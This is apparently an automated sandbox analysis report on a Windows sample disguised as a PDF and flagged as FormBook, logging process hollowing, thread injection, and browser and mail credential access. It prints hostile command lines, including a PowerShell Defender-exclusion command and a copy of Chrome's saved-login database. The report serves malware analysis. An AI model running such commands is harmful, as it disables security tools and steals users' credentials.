Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 4004	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4004
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Thread register set: target process: 4004

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: DE0000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\calc.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\cmd.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\System32\svchost.exe base address: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Internet Explorer\iexplore.exe base address: 400000	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	Section unmapped: C:\Windows\System32\conhost.exe base address: C90000
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base address: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe	Section unmapped: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base address: 400000
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 240000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E7C008	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 401000	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 300A008	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 401000
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 2F07008

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE4ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

9_2_00DE4ACA

Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2130140124.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2127441350.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000007.00000000.2127914543.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4585508017.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000007.00000003.3076417197.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3074909396.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EC890
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EB900
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: GetLocaleInfoEx,	0_2_00007FF7D78EC960

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7860860 GetSystemTimeAsFileTime,

0_2_00007FF7D7860860

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\ipconfig.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\ipconfig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

